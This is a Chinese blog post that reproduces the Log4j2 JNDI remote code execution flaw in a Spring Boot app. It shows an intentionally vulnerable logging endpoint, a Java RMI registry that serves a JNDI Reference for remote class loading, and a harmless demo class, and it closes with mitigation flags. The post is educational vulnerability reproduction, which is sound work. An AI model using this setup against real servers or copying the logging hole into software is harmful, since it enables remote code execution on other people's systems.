集成了log4j的SpringBoot下的漏洞復(fù)現(xiàn)

1. 前景提要

Log4j史詩級漏洞這幾天鬧的沸沸揚(yáng)揚(yáng),讓我也想一探究竟刺桃,到底是怎么觸發(fā)的粹淋。

2. 搭建一個(gè)集成Log4j的SpringBoot項(xiàng)目

根據(jù)spring官網(wǎng)的指引吸祟,創(chuàng)建一個(gè)springboot項(xiàng)目瑟慈,然后對pom文件進(jìn)行一個(gè)修改

<dependencies>
        <dependency>
            <groupId>org.springframework.boot</groupId>
            <artifactId>spring-boot-starter-web</artifactId>
            <exclusions>
                <exclusion>
                    <groupId>org.springframework.boot</groupId>
                    <artifactId>spring-boot-starter-logging</artifactId>
                </exclusion>
            </exclusions>
        </dependency>

        <dependency>
            <groupId>org.springframework.boot</groupId>
            <artifactId>spring-boot-starter-log4j2</artifactId>
        </dependency>

    </dependencies>

2.1 查看引入的依賴

可以看到我引入的log4j的依賴是2.15.0版本以下的桃移,也就是會觸發(fā)這個(gè)bug的

image.png

2.2 寫一個(gè)常用的接口接受外部傳入的參數(shù)

package run.runnable.learn;
import org.apache.logging.log4j.Logger;
import org.apache.logging.log4j.LogManager;

import org.apache.logging.log4j.LogManager;
import org.apache.logging.log4j.Logger;
import org.springframework.boot.SpringApplication;
import org.springframework.boot.autoconfigure.SpringBootApplication;
import org.springframework.stereotype.Controller;
import org.springframework.web.bind.annotation.PostMapping;
import org.springframework.web.bind.annotation.RequestBody;
import org.springframework.web.bind.annotation.ResponseBody;

import javax.annotation.PostConstruct;

@SpringBootApplication
@Controller
public class LearnApplication {

    private static final Logger logger = LogManager.getLogger(LearnApplication.class);

    public static void main(String[] args) {
        SpringApplication.run(LearnApplication.class, args);
    }

    @PostMapping("/hack")
    @ResponseBody
    public String testHackExecute(@RequestBody String content){
        logger.info("content:{}", content);
        return content;
    }

}

這里寫了一個(gè)hack的接口,當(dāng)接口有參數(shù)傳入的時(shí)候葛碧,會進(jìn)行打印借杰,這種代碼大家?guī)缀醵加袑戇^的吧。這也是這個(gè)漏洞非常嚴(yán)重的原因之一:易于觸發(fā)

3. 測試漏洞

3.1 傳入指定參數(shù)打印vm信息

使用postman進(jìn)行調(diào)用接口进泼,可以看到成功返回蔗衡。

image.png

讓我們?nèi)ハ到y(tǒng)的日志看看,打印不是 ${java:vm}乳绕,而是JDK的信息绞惦!

image.png

3.2 測試rmi遠(yuǎn)程調(diào)用

如果僅僅只是上面的那種情況還好說,至少只是生成一些錯誤日志洋措,但是這個(gè)rmi遠(yuǎn)程調(diào)用的危害就很大济蝉。

讓我們先用java原生的rmi寫一個(gè)注冊中心,然后注冊一個(gè)服務(wù)

public static void main(String[] args) {
        try {
            LocateRegistry.createRegistry(1099);
            Registry registry = LocateRegistry.getRegistry();
            Reference reference = new Reference("run.runnable.learn.rmi.HackExecute", "run.runnable.learn.rmi.HackExecute", null);
            ReferenceWrapper referenceWrapper = new ReferenceWrapper(reference);
            System.out.println("service started");
            registry.bind("hack", referenceWrapper);
        } catch (RemoteException | NamingException | AlreadyBoundException e) {
            e.printStackTrace();
        }
    }

再一個(gè)可以被執(zhí)行的類

public class HackExecute {

    static {
        System.out.println("HackExecute:Successful execution");
    }

}

我們把上面的服務(wù)rmi服務(wù)進(jìn)行啟動菠发,然后使用postman進(jìn)行調(diào)用王滤。

image.png

當(dāng)我們在控制臺進(jìn)行日志查看的時(shí)候,你就會發(fā)現(xiàn)滓鸠,rmi遠(yuǎn)程調(diào)用被成功執(zhí)行了雁乡!

image.png

這意味著我可以把自己寫的代碼,通過這種方式在對方的服務(wù)器進(jìn)行執(zhí)行糜俗,不愧是史詩級漏洞踱稍。

4. 緊急補(bǔ)救措施

(1) 修改jvm參數(shù) -Dlog4j2.formatMsgNoLookups=true

(2) 修改配置log4j2.formatMsgNoLookups=True

(3) 將系統(tǒng)環(huán)境變量 FORMAT_MESSAGES_PATTERN_DISABLE_LOOKUPS 設(shè)置為 true

4. 相關(guān)資料

Apache 存在 Log4j 遠(yuǎn)程代碼執(zhí)行漏洞,將給相關(guān)企業(yè)帶來哪些影響悠抹?還有哪些信息值得關(guān)注寞射? - nlfox的回答 - 知乎

Logging Services - Lookups

【重要通知】關(guān)于Apache Log4j 2遠(yuǎn)程代碼執(zhí)行最新漏洞的風(fēng)險(xiǎn)提示

歡迎關(guān)注我的菠蘿的博客 ,獲得最新更新

最后編輯于
?著作權(quán)歸作者所有,轉(zhuǎn)載或內(nèi)容合作請聯(lián)系作者
  • 序言:七十年代末锌钮,一起剝皮案震驚了整個(gè)濱河市桥温,隨后出現(xiàn)的幾起案子,更是在濱河造成了極大的恐慌梁丘,老刑警劉巖侵浸,帶你破解...
    沈念sama閱讀 219,188評論 6 508
  • 序言:濱河連續(xù)發(fā)生了三起死亡事件,死亡現(xiàn)場離奇詭異氛谜,居然都是意外死亡掏觉,警方通過查閱死者的電腦和手機(jī),發(fā)現(xiàn)死者居然都...
    沈念sama閱讀 93,464評論 3 395
  • 文/潘曉璐 我一進(jìn)店門值漫,熙熙樓的掌柜王于貴愁眉苦臉地迎上來澳腹,“玉大人,你說我怎么就攤上這事〗此” “怎么了沥邻?”我有些...
    開封第一講書人閱讀 165,562評論 0 356
  • 文/不壞的土叔 我叫張陵,是天一觀的道長羊娃。 經(jīng)常有香客問我唐全,道長,這世上最難降的妖魔是什么蕊玷? 我笑而不...
    開封第一講書人閱讀 58,893評論 1 295
  • 正文 為了忘掉前任邮利,我火速辦了婚禮,結(jié)果婚禮上垃帅,老公的妹妹穿的比我還像新娘延届。我一直安慰自己,他們只是感情好贸诚,可當(dāng)我...
    茶點(diǎn)故事閱讀 67,917評論 6 392
  • 文/花漫 我一把揭開白布方庭。 她就那樣靜靜地躺著,像睡著了一般赦颇。 火紅的嫁衣襯著肌膚如雪二鳄。 梳的紋絲不亂的頭發(fā)上,一...
    開封第一講書人閱讀 51,708評論 1 305
  • 那天媒怯,我揣著相機(jī)與錄音订讼,去河邊找鬼。 笑死扇苞,一個(gè)胖子當(dāng)著我的面吹牛欺殿,可吹牛的內(nèi)容都是我干的。 我是一名探鬼主播鳖敷,決...
    沈念sama閱讀 40,430評論 3 420
  • 文/蒼蘭香墨 我猛地睜開眼脖苏,長吁一口氣:“原來是場噩夢啊……” “哼!你這毒婦竟也來了定踱?” 一聲冷哼從身側(cè)響起棍潘,我...
    開封第一講書人閱讀 39,342評論 0 276
  • 序言:老撾萬榮一對情侶失蹤,失蹤者是張志新(化名)和其女友劉穎崖媚,沒想到半個(gè)月后亦歉,有當(dāng)?shù)厝嗽跇淞掷锇l(fā)現(xiàn)了一具尸體,經(jīng)...
    沈念sama閱讀 45,801評論 1 317
  • 正文 獨(dú)居荒郊野嶺守林人離奇死亡畅哑,尸身上長有42處帶血的膿包…… 初始之章·張勛 以下內(nèi)容為張勛視角 年9月15日...
    茶點(diǎn)故事閱讀 37,976評論 3 337
  • 正文 我和宋清朗相戀三年肴楷,在試婚紗的時(shí)候發(fā)現(xiàn)自己被綠了。 大學(xué)時(shí)的朋友給我發(fā)了我未婚夫和他白月光在一起吃飯的照片荠呐。...
    茶點(diǎn)故事閱讀 40,115評論 1 351
  • 序言:一個(gè)原本活蹦亂跳的男人離奇死亡赛蔫,死狀恐怖砂客,靈堂內(nèi)的尸體忽然破棺而出,到底是詐尸還是另有隱情呵恢,我是刑警寧澤鞠值,帶...
    沈念sama閱讀 35,804評論 5 346
  • 正文 年R本政府宣布,位于F島的核電站瑰剃,受9級特大地震影響齿诉,放射性物質(zhì)發(fā)生泄漏筝野。R本人自食惡果不足惜晌姚,卻給世界環(huán)境...
    茶點(diǎn)故事閱讀 41,458評論 3 331
  • 文/蒙蒙 一、第九天 我趴在偏房一處隱蔽的房頂上張望歇竟。 院中可真熱鬧挥唠,春花似錦、人聲如沸焕议。這莊子的主人今日做“春日...
    開封第一講書人閱讀 32,008評論 0 22
  • 文/蒼蘭香墨 我抬頭看了看天上的太陽盅安。三九已至唤锉,卻和暖如春,著一層夾襖步出監(jiān)牢的瞬間别瞭,已是汗流浹背窿祥。 一陣腳步聲響...
    開封第一講書人閱讀 33,135評論 1 272
  • 我被黑心中介騙來泰國打工, 沒想到剛下飛機(jī)就差點(diǎn)兒被人妖公主榨干…… 1. 我叫王不留蝙寨,地道東北人晒衩。 一個(gè)月前我還...
    沈念sama閱讀 48,365評論 3 373
  • 正文 我出身青樓,卻偏偏與公主長得像墙歪,于是被迫代替她去往敵國和親听系。 傳聞我的和親對象是個(gè)殘疾皇子,可洞房花燭夜當(dāng)晚...
    茶點(diǎn)故事閱讀 45,055評論 2 355

推薦閱讀更多精彩內(nèi)容